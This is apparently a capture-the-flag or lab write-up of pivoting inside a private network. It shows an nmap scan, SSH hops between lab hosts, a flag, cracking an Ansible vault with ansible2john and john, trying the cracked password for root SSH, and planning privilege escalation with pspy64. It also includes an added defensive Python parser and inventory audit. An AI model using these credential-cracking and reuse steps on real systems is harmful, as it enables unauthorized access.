Command: nmap -A -Pn 192.168.243.173

Nmap initial output

Nmap scan report for 192.168.243.173
Host is up (0.21s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE  SERVICE         VERSION
22/tcp   open   ssh             OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 1f:11:e4:0b:3b:8a:e3:12:e9:44:10:7a:c9:64:98:f3 (RSA)
|   256 8a:f7:59:6b:af:db:14:0a:e8:4f:2a:4d:c9:66:04:e7 (ECDSA)
|_  256 d7:cf:21:25:eb:d2:7e:1a:b4:6b:77:41:56:bf:c8:c1 (ED25519)
8081/tcp closed blackice-icecap
8082/tcp closed blackice-alerts
Aggressive OS guesses: Linux 3.11 - 4.1 (93%), Linux 4.4 (93%), Linux 3.16 (90%), Linux 3.13 (90%), Linux 3.10 - 3.16 (88%), Linux 3.10 - 3.12 (88%), Linux 2.6.32 (88%), Linux 3.2 - 3.8 (88%), Linux 3.8 (88%), WatchGuard Fireware 11.8 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8082/tcp)
HOP RTT       ADDRESS
-   Hop 1 is the same as for 192.168.243.172
2   205.18 ms 192.168.243.173

192.168.243.172

nottodd@cb2:/home/nottodd/.ssh/controlmaster$ ssh marks@cb3

16.png

Flag obtained: 087fade67b1acec922746aa2694c704d

Go to the /opt/ansible directory and view the contents of webserver.yaml:

17.png

Save the content in the red box in the image above and crack the vault password:

python3 /usr/share/john/ansible2john.py ansible_webserver.txt > ansible2johnhash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt ansible2johnhash.txt

18.png

Continue with decryption:

19.png

View /etc/ansible/hosts:

20.png

Try to SSH into 192.168.243.171 as root with the recovered password lifeintheantfarm.
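An added example (not part of the original writeup) in Python showing what the two files above expose from a defender's view: a parser for the Ansible Vault 1.1 envelope that pulls out the salt, HMAC and ciphertext that ansible2john extracts for john, and an audit of an INI inventory for plaintext credential variables. The vault bytes, addresses and password in it are constructed, not taken from the target.

```python
import binascii
import re

VAULT_HEADER = "$ANSIBLE_VAULT;1.1;AES256"
# Inventory variables that carry connection or escalation secrets in the clear.
SECRET_VARS = ("ansible_password", "ansible_ssh_pass",
               "ansible_become_pass", "ansible_sudo_pass")

def parse_vault(text):
    """Split a Vault 1.1 envelope into (salt, hmac, ciphertext) bytes.
    The hex body decodes to three newline-separated hex fields: PBKDF2 salt,
    HMAC-SHA256 of the ciphertext, AES-CTR ciphertext. Those three values are
    all an offline wordlist check needs, so a weak vault password is as exposed
    as a password hash."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if lines[0] != VAULT_HEADER:
        raise ValueError("not a Vault 1.1/AES256 envelope: %r" % lines[0])
    inner = binascii.unhexlify("".join(lines[1:]))
    salt_hex, mac_hex, ct_hex = inner.split(b"\n", 2)
    salt, mac, ct = (binascii.unhexlify(f) for f in (salt_hex, mac_hex, ct_hex))
    if len(salt) != 32 or len(mac) != 32:  # Ansible: 32-byte salt, SHA-256 HMAC
        raise ValueError("unexpected salt or hmac length")
    return salt, mac, ct

def build_vault(salt, mac, ct):
    """Assemble an envelope in the layout Ansible writes (used only to build
    the constructed sample below; it does not encrypt anything)."""
    inner = b"\n".join(binascii.hexlify(f) for f in (salt, mac, ct))
    body = binascii.hexlify(inner).decode()
    return VAULT_HEADER + "\n" + "\n".join(body[i:i + 80] for i in range(0, len(body), 80))

def audit_inventory(text):
    """Return (host, variable) pairs for INI inventory entries that put a
    password in the clear; INI inventories cannot hold vaulted values."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "[")):
            continue
        host = line.split()[0]
        findings += [(host, v) for v in SECRET_VARS if re.search(r"\b%s=" % v, line)]
    return findings

# Constructed samples: fixed bytes stand in for a real salt/HMAC/ciphertext,
# and the inventory uses documentation addresses and a placeholder password.
SAMPLE_VAULT = build_vault(b"\x01" * 32, b"\x02" * 32, b"constructed-ciphertext")
SAMPLE_INVENTORY = """[webservers]
web1 ansible_host=192.0.2.10 ansible_user=root ansible_ssh_pass=PLACEHOLDER-PASSWORD
[db]
db1 ansible_host=192.0.2.11 ansible_user=deploy
"""
```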

Try privilege escalation on 192.168.243.173: download pspy64 to observe which processes are running:

22.png